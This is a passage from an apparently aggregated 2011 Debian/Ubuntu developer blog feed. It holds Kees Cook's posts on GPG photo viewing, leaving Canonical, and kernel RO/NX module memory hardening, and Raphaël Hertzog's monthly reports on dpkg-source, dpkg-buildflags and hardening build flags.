were dead Ubuntu Archive Mirrors in the DNS rotation. For anyone else wanting to spin up builders in the cloud using juju, I have a run-down of what this looks like from the admin's perspective, and even include a little script to produce little slips of paper to hand out to attendees with an instance's hostname, ssh keys, and builder SSH password. Seemed to work pretty well overall; I just wish I could have spun up a few more. :) So, even with the fighting with juju and a few extra instances that came up and had to be shut down again without actually being used, the total cost to run the instances for the whole BSP was about US$40, and including the charm development time, about US$45. UPDATE: some more details on how to avoid the glitches I hit.

2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

5 December 2011

Kees Cook: PGP key photo viewing

Handy command line arguments for gpg:
gpg --list-options show-photos --fingerprint 0xdc6dc026
This is nice for examining someone's PGP photo. You can also include it in --verify-options, depending on how/when you want to see the photo (for example, when doing key signings). If gpg doesn't pick the right photo viewer, you can override it with --photo-viewer 'eog %I' or similar.
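For example, to get the same photo display while verifying a signature (the file name here is just a placeholder):
gpg --verify-options show-photos --photo-viewer 'eog %I' --verify announcement.txt.asc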

2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

12 September 2011

Kees Cook: 5 years with Canonical

This month, I will have been with Canonical for 5 years. It's been fantastic, but I've decided to move on. Next week, I'm going to start working for Google, helping out with ChromeOS, which I'm pretty excited about. I'm sad to be leaving Canonical, but I comfort myself by knowing that I'm not leaving Ubuntu or any other projects I'm involved in. I believe in Ubuntu, I use it everywhere, and I'm friends with so many of its people. And I'm still core-dev, so I'll continue to break^Wsecure things as much as I can in Ubuntu, and continue working on getting similar stuff into Debian. :) For nostalgic purposes, I dug up my first security update (sponsored by pitti), and my first Ubuntu Security Notice. I'm proud of Ubuntu's strong security record and how far the security feature list has come. The Ubuntu Security Team is an awesome group of people, and I'm honored to have worked with them. I'm looking forward to the new adventures, but I will miss the previous ones.

2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

4 September 2011

Rapha&#235;l Hertzog: My Debian activities in August 2011

This is my monthly summary of my Debian related activities. If you're among the people who made a donation to support my work (91.44€, thanks everybody!), then you can learn how I spent your money. Otherwise it's just an interesting status update on my various projects.

Dpkg work

When I came back from DebConf, I merged my implementation of dpkg-source --commit (already presented last month). I continued some work on the hardening build flags, but it's currently stalled waiting on Kees Cook to provide the required documentation to integrate into dpkg-buildflags(1). Following a discussion held during DebConf, Michael Prokop has been kind enough to set up a git-triggered auto-builder of dpkg (using Jenkins). You can now help us by testing the latest git version. Follow these instructions:
$ wget -O - http://jenkins.grml.org/debian/C525F56752D4A654.asc | sudo apt-key add -
$ sudo sponge /etc/apt/sources.list.d/dpkg-git <<END
deb http://jenkins.grml.org/debian dpkg main
END
$ sudo apt-get update && sudo apt-get upgrade
On the bug fixing side, I took care of #640198 (minor man page update), #638291 (a fix to correctly handle hardlinks of conffiles), #637564 (the simplification logic of union dependencies was broken in some cases) and #631494 (interrupting dpkg-source while building a native source package left some temporary files around that should have been cleaned).

WordPress update

I released WordPress 3.2.1 in unstable (after having taken the time to test the updated package on my blog!) and fixed its RC bug (#625773). In the process I discovered a false positive in lintian (I reported it in #637473).

Gnome-shell-timer package

From time to time, I like to use the Pomodoro Technique. That's why I was a user of timer-applet in GNOME 2. Now with the switch to GNOME 3, I lost this feature. But I recently discovered gnome-shell-timer, a GNOME Shell extension that provides the same features. I created a Debian package of it and quickly filed some bugs while I was testing it (two usability issues and an encoding problem).

QA Work

During DebConf I met Giovanni Mascellani and he was interested in helping the QA team. He started working on the backlog of bugs concerning the Package Tracking System (PTS) and submitted a bunch of patches. I reviewed and merged them, but since they were good, I quickly got lazy and got him added to the QA team so that he can commit his fixes alone. It also helps to build trust when you have had the opportunity to discuss face to face. :-)

Vacation

That's not so much compared to usual, but in my defense I also took 2 weeks of vacation with my family. Somehow, even on vacation, I can't really forget Debian. Here's my son:
Thanks

See you next month for a new summary of my activities.


4 August 2011

Rapha&#235;l Hertzog: My Debian activities in July 2011

This is my monthly summary of my Debian related activities. If you're among the people who made a donation to support my work (170€, thanks everybody!), then you can learn how I spent your money. Otherwise it's just an interesting status update on my various projects. This month passed by very quickly since I attended both the Libre Software Meeting / RMLL and DebConf.

Libre Software Meeting / RMLL

I attended only 3 days out of the 6, but that was a deliberate choice since I was also attending DebConf for a full week later in the month. During those 3 days I helped with the Debian booth that was already well taken care of by Frédéric Perrenot and Arnaud Gambonnet. Unfortunately we did not have any goodies to sell. We (as in Debian France) should do better in this regard next time. One of the talks I attended presented EnVenteLibre. This website started as an online shop for two French associations (Ubuntu-fr, Framasoft). They externalize all the logistics to a company and only have to care about ordering goodies and delivering to the warehouse of the logistics company. They can also take some goodies from the warehouse and ship them for a conference, etc. We discussed a bit to see how Debian France could join; they are even ready to study what can be done to operate at the international level (that would be interesting for Debian with all the local associations that we have throughout the world). Back to the LSM: while I had 3 good days in Strasbourg, it seems to me that the event is slowly fading out. It's far from being an international event, and the number of talks doesn't make for better quality. BTW, do you remember that DebConf 0 and DebConf 1 were associated with this event while it was in Bordeaux?

dpkg-source improvements

During my time in Strasbourg (and in particular the travel to go there and back!) I implemented some changes to the 3.0 (quilt) source format. It will now fail to build the source package if there are upstream changes that are not properly recorded in a quilt patch:
dpkg-source: info: local changes detected, the modified files are:
 2ping-1.1/README
dpkg-source: info: you can integrate the local changes with dpkg-source --commit
dpkg-source: error: aborting due to unexpected upstream changes, see /tmp/2ping_1.1-1.diff.cki8YB
As the error message hints, there's a new --commit command supported by dpkg-source that will generate the required quilt patch to fix this. In the process you will have to submit a name and edit the patch header (pre-formatted with DEP3 compatible fields). You can get back the old behavior with the --auto-commit option.

Build flags changes

Ever since we adopted the Ubuntu changes to let dpkg-buildpackage set some build related environment variables (see #465282), many Debian people expressed their concerns with this approach, both because it broke some packages and because those variables are not set if you execute debian/rules directly. In the end, the change was not quickly reverted and we fixed the packages that this change broke. Despite this, we later decided that the correct approach to inject build flags would be a new interface: dpkg-buildflags. Before changing dpkg-buildpackage to no longer set the compilation flags, I wanted to ensure dpkg-buildflags had some decent coverage in the archive (to avoid breaking too many packages again). My criterion was that CDBS and dh (of debhelper) should be using it. With the recent debhelper change (see #544844) this has been reached, so I changed dpkg-buildpackage accordingly.

Makefile snippets provided by dpkg

At the same time, I also wanted an easy way for maintainers not using dh or CDBS to be able to fix their package easily and go back to injecting the compilation flags in the environment, but doing it from the rules file. Starting with the next version of dpkg, this will be possible with something like this:
DPKG_EXPORT_BUILDFLAGS = 1
include /usr/share/dpkg/default.mk
Without DPKG_EXPORT_BUILDFLAGS the variables are not exported in the environment and have no effect unless you use them somewhere. More than build flags, this will also provide a bunch of other variables that can be useful in a rules file: all the variables provided by dpkg-architecture, vendor related variables/macros and some basic package information (mainly version related).

dpkg-buildflags improvements

Given the renewed importance that dpkg-buildflags will take now that dpkg-buildpackage no longer sets the corresponding environment variables, I thought that I could give it some love by fixing all the open issues and implementing some suggestions I got. I also had a chat with a few members of the technical committee to discuss how hardening build flags could be enabled in Debian, and this also resulted in a few ideas for improvements. In the end, here are the main changes implemented: With all those changes, the complete set of compilation flags can be returned by dpkg-buildflags (before, it would only return the default flags and it was expected that the Debian packaging would add whatever else is required afterwards). Now the maintainer just has to use the new environment variables to ensure the returned values correspond to what the package needs.

DebConf: rolling and hardening build flags

I spent a full week at DebConf (from Sunday 24th to Sunday 31st) and as usual, it's been a pleasure to meet all my Debian friends again. It's always difficult to find a good balance between attending talks, working in the hacklab and socializing, but I'm pretty happy with the result. I did not have any goal when I arrived, except managing the Rolling BoF (slides and video here), but all the discussions during talks always lead to a growing TODO list. This year was no exception. The technical committee BoF resulted in some discussions of some of the pending issues, in particular one that interests me: how to enable hardening build flags in Debian (see #552688). We scheduled another discussion on the topic for Tuesday, and the outcome is that dpkg-buildflags is the proper interface to inject hardening build flags, provided that it offers a means to drop unwanted flags and a practical way to inject them in the ./configure command line. Given this, I got to work and implemented those new features, and worked with Kees Cook to prepare a patch that enables the hardening build flags by default. It's not ready to be merged, but it's working already (see my last update in the bug log). A few words about the Rolling BoF too. The room was pretty crowded: as usual, the topic generates lots of interest. My goal with the BoF was very limited: I wanted to weigh the importance of the various opinions expressed in the last gigantic discussion on debian-devel. It turns out a vast majority of attendees believe that testing is already usable. But when you ask them if we must advertise it more, answers are relatively mixed. When asked if we can sustain lots of testing/rolling users, few people feel qualified to reply, but those that do tend to say yes.

More dpkg work

Lots of small things done:

Package Tracking System and DEHS

Christoph Berg recently wrote a replacement for DEHS because the latter was not really reliable and not under the control of the QA team. This is a centralized system that uses the watch files to detect new upstream versions of the software available in Debian. I updated the Package Tracking System to use this new tool instead of DEHS. The new thing works well, but we're still lacking the mail notifications that DEHS used to send out. If someone wants to contribute it, that would be great!

Misc packaging work

I did some preliminary work to update the WordPress package to the latest upstream version (3.2). I still have to test the resulting package; replacing upstream-shipped copies of javascript/PHP libraries is always a risk, and unfortunately all of them had some changes in the integration process. I also updated nautilus-dropbox to version 0.6.8 released upstream. I also uploaded the previous version (that was in testing at that time) to squeeze-backports. So there's now an official package in all the Debian distributions (Squeeze, Wheezy, Sid and Experimental)!

Thanks

See you next month for a new summary of my activities.


12 July 2011

Kees Cook: aliens hat-tip

Picked up a Doctor Who comic today and saw a nice hat-tip to (or composite ship design plagiarism of) Aliens. The Colonial Marines' ship Sulaco, from Aliens, 1986:
[image: Aliens ship] The Scavengers' ship, from the Doctor Who "Spam Filtered" story, 2011:
[image: Doctor Who art] Such a great ship. Not even remotely made to look aerodynamic. And to make this almost related to Ubuntu and Debian, here was my command line to remove exif data from the image I took with my phone: mogrify -strip spam-filtered.jpg

2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

27 April 2011

Kees Cook: non-executable kernel memory progress

The Linux kernel attempts to protect portions of its memory from unexpected modification (through potential future exploits) by setting areas read-only where the compiler has allowed it (CONFIG_DEBUG_RODATA). This, combined with marking function pointer tables const, reduces the number of easily writable kernel memory targets for attackers. However, modules (which are almost the bulk of kernel code) were not handled, and remained read-write, regardless of compiler markings. In 2.6.38, thanks to the efforts of many people (especially Siarhei Liakh and Matthieu Castet), CONFIG_DEBUG_SET_MODULE_RONX was created (and CONFIG_DEBUG_RODATA expanded). To visualize the effects, I patched Arjan van de Ven's arch/x86/mm/dump_pagetables.c to be a loadable module so I could look at /sys/kernel/debug/kernel_page_tables without needing to rebuild my kernel with CONFIG_X86_PTDUMP. Comparing Lucid (2.6.32), Maverick (2.6.35), and Natty (2.6.38), it's clear to see the effects of the RO/NX improvements, especially in the Modules section, which has no NX markings at all before 2.6.38:
lucid-amd64# awk '/Modules/,/End Modules/' /sys/kernel/debug/kernel_page_tables | grep NX | wc -l
0
maverick-amd64# awk '/Modules/,/End Modules/' /sys/kernel/debug/kernel_page_tables | grep NX | wc -l
0
natty-amd64# awk '/Modules/,/End Modules/' /sys/kernel/debug/kernel_page_tables | grep NX | wc -l
76
2.6.38's memory region is much more granular, since each module has been chopped up for the various segment permissions:
lucid-amd64# awk '/Modules/,/End Modules/' /sys/kernel/debug/kernel_page_tables | wc -l
53
maverick-amd64# awk '/Modules/,/End Modules/' /sys/kernel/debug/kernel_page_tables | wc -l
67
natty-amd64# awk '/Modules/,/End Modules/' /sys/kernel/debug/kernel_page_tables | wc -l
155
For example, here's the large sunrpc module. RW is read-write, ro is read-only, x is executable, and NX is non-executable:
maverick-amd64# awk '/^'$(awk '/^sunrpc/ {print $NF}' /proc/modules)'/','!/GLB/' /sys/kernel/debug/kernel_page_tables
0xffffffffa005d000-0xffffffffa0096000         228K     RW             GLB x  pte
0xffffffffa0096000-0xffffffffa0098000           8K                           pte
natty-amd64# awk '/^'$(awk '/^sunrpc/ {print $NF}' /proc/modules)'/','!/GLB/' /sys/kernel/debug/kernel_page_tables
0xffffffffa005d000-0xffffffffa007a000         116K     ro             GLB x  pte
0xffffffffa007a000-0xffffffffa0083000          36K     ro             GLB NX pte
0xffffffffa0083000-0xffffffffa0097000          80K     RW             GLB NX pte
0xffffffffa0097000-0xffffffffa0099000           8K                           pte
The latter looks a whole lot more like a proper ELF (text segment is read-only and executable, rodata segment is read-only and non-executable, and data segment is read-write and non-executable). Just another reason to make sure you're using your CPU's NX bit (via 64bit or 32bit-PAE kernels)! (And no, PAE is not slower in any meaningful way.)
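A quick way to check whether your own machine qualifies (this sketch assumes a Debian/Ubuntu-style /boot/config-* file is available for the kernel config check):
# CPU advertises the NX bit:
grep -m1 -ow nx /proc/cpuinfo
# Kernel is 64bit, or 32bit with PAE enabled:
uname -m
grep CONFIG_X86_PAE /boot/config-$(uname -r)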

5 April 2011

Kees Cook: Linux Security Summit 2011 CFP

I'm once again on the program committee for the Linux Security Summit, so I'd love to see people submit talks, attend, etc. It will be held along with the Linux Plumbers Conference, on September 8th in Santa Rosa, CA, USA. I'd really like to see more non-LSM developers and end users show up for this event. We need people interested in defining threats and designing defenses. There is a lot of work to be done on all kinds of fronts, and having people voice their opinions and plans can really help us prioritize the areas that need the most attention. Here's one of many archives of the announcement, along with the website. We've got just under 2 months to get talks submitted (May 27th deadline), with speaker notification quickly after that on June 1st. Come help us make Linux more secure! :)
